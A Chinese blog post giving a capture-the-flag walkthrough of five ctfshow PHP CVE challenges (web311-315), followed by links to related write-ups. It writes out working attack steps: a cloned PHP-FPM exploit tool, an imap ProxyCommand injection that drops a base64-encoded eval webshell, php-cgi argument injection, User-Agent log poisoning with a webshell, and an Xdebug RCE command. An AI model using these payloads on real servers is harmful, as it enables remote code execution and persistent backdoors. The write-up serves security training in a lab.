ctfshow web入门phpcve web311-315

最新推荐文章于 2024-03-22 09:34:52 发布
最新推荐文章于 2024-03-22 09:34:52 发布
阅读量468 收藏
点赞数
分类专栏: ctfshow通关 文章标签: 前端 php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130327883
版权

1.web311

通过抓包发现php版本时为PHP/7.1.33dev
漏洞cve2019-11043 远程代码执行漏洞
利用条件: nginx配置了fastcgi_split_path_info
受影响系统: PHP 5.6-7.x,Nginx>=0.7.31

下载工具进行利用
需要安装go环境

yum install golang -y   
或者
apt install golang
git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go env -w GOPROXY=https://goproxy.cn
go get -v && go build

利用:

go run . url/index.php 
查看flag在什么位置  
url/index.php?a=ls

在这里插入图片描述
在这里插入图片描述

2.web312

抓包版本
PHP/5.6.38
漏洞编号 CVE-2018-19518 远程命令执行漏洞

<?php
$a= base64_encode('<?php @eval($_POST[1]);?>');
echo base64_encode("echo $a | base64 -d >/var/www/html/1.php")
?>

抓包hostname传入 ,写入了一句哈木马,密码为1
x+-oProxyCommand%3decho%09ZWNobyBQRDl3YUhBZ1FHVjJZV3dvSkY5UVQxTlVXekZkS1RzL1BnPT0gfCBiYXNlNjQgLWQgPi92YXIvd3d3L2h0bWwvMS5waHA=|base64%09-d|sh}
post传入,查看flag位置
1=system('ls');
读取flag
1=system('cat ctfshowfl4g ');

在这里插入图片描述

3.web 313

php版本PHP/5.4.1
编号CVE-2012-1823 远程代码执行漏洞

burp抓包

index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
<?php system("ls");?>
<?php system("cat  /somewhere/fla9.txt");?>

在这里插入图片描述

4.web314

在这里插入图片描述
文件包含漏洞,过滤了冒号,一些伪协议用不了了,可以使用ua头日志包含

burp抓包ua写入一句话木马,包含日志文件

改为post方式
/?f=/var/log/nginx/access.log
ua头写入
<?php @eval($_POST[10])?>
post传入
10=system('ls /');
10=system('cat /fl6g');

在这里插入图片描述

5.web315

xdebug 9000 远程调试漏洞
利用脚本
需要有公网ip
会监听本地9000端口

python exp.py -t url/index.php  -c 'shell_exec("ls /");'

在这里插入图片描述
直接访问即可

参考文章:
web311-315

mushangqiujin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow phpCVE web311~315
shinygod的博客
10-07 669
php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。
Ctfshow web-web31
qq_45427131的博客
05-16 307
首先查看源代码,还是preg_match函数,这次过滤了 flag|system|php|cat|sort|shell|.| |’ 这次过滤了以上函数 多了对单引号的过滤,单引号的过滤是小问题,因为 <?php eval($_POST['a']);?>中单引号是可有可无的 <?php eval($_POST['a']);?> = <?php eval($_POST[a]);?> 而对于system的过滤,则可以用其他php的命令执行函数代替,比如passthru 构造
ctf_show笔记篇(web入门---phpCVE
最新发布
whale_waves的博客
03-22 1201
CVE-2019-11043漏洞是PHP的一个远程代码执行漏洞,该漏洞产生与Nginx利用fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符(%0a)导致PATH_INFO为空,最终可导致任意代码执行。头指定的地址)并通过dbgp协议与其通信,我们通过dbgp中提供的eval方法即可在目标服务器上执行任意PHP代码。x+-oProxyCommand=echo 'base64编码后的命令'|base64 -d|sh}漏洞名称:PHP-CGI远程代码执行漏洞。
CVE-2019-11043 PHP-FPM 复现和学习(环境CTFShow web311
paidx0
08-09 468
CVE-2019-11043复现和学习 漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。 该漏洞需要在nginx.conf中进行特定配置才能触发。 location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcg
web311~web315phpCVE
pandasaymmm的博客
04-03 144
PHP 7.0 版本、PHP 7.1 版本、PHP 7.2 版本、PHP 7.3 版本。web312 PHP imap 远程命令执行漏洞(CVE-2018-19518)在 Nginx + PHP-FPM 环境下。先对一句话base64,再用echo解码。web315:XDebug 远程调试漏洞。
Ctfshow web入门 phpCVEweb311-web315 详细题解 全
Jay17的博客
09-23 520
Ctfshow web入门 phpCVEweb311-web315 详细题解 全
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
CTFSHOW-phpCVE Writeup
weixin_59419135的博客
11-25 1271
ctfshow phpCVEweb311,web312,web313,web314,web315) CVE-2019-11043,CVE-2018-19935,CVE-2012-1823,PHP_SESSION_UPLOAD_PROGRESS文件包含, XDebug 远程调试漏洞
ctfshow phpCVE web311-web315 wp
mumuzi的博客
02-04 1788
ctfshow-php-CVE-wp----------
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 842
ctfshow,命令执行,web31
CTFshow刷题日记-WEB-PHPCVE(web311-315)包括PHP-fpm远程代码执行,PHPimap_open函数任意命令执行,PHP-CGI远程代码执行,XDebug 远程调试漏洞
Love&Share
10-03 3045
web311-CVE-2019-11043-PHP-fpm远程代码执行漏洞 提示:似曾相识,就这一个文件,不用扫描 注释中只有一个<!-- cve-->用burp抓包发现响应行中的X-Powered-By字段很可疑 谷歌之后发现该PHP版本存在漏洞:PHP 远程代码执行漏洞(CVE-2019-11043 漏洞原理 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码 向Nginx + PHP-FP
CTFshow phpCVE
starttv的博客
12-05 779
CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: 攻击者可以使用换行符(%0a)来破坏​指令中的Regexp。Regexp被损坏导致PATH_INFO为空,从而触发该漏洞。安装漏洞利用工具 在phuip-fpizdam目录下执行 go run . "htt
CVE-2019-11043远程代码执行漏洞复现
qq_42133828的博客
11-02 6777
CVE-2019-11043远程代码执行漏洞复现 漏洞名称: php fastcgi 远程命令执行漏洞 漏洞类型: 远程代码执行漏洞 漏洞危害: 高危 漏洞来源: https://www.nginx.com/blog/php-fpm-cve-2019-11043-vulnerability-nginx/ 公布时间: 2019-10-28 涉及应用版本: <7.1.33的PHP版本7.1.x ...
ctf.show的phpCVE(web311-web315)
wanan的博客
09-30 262
ctf.show的phpCVE(web311-web315)
ctfshow web入门 web11
12-12
根据提供的引用内容,我们可以得知ctfshow web入门系列共有20道题目,其中web11是其中的一道题目。由于没有提供具体的题目描述,我无法给出具体的解答。但是,我可以为您提供一些解决CTF Web题目的一般性建议: 1....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值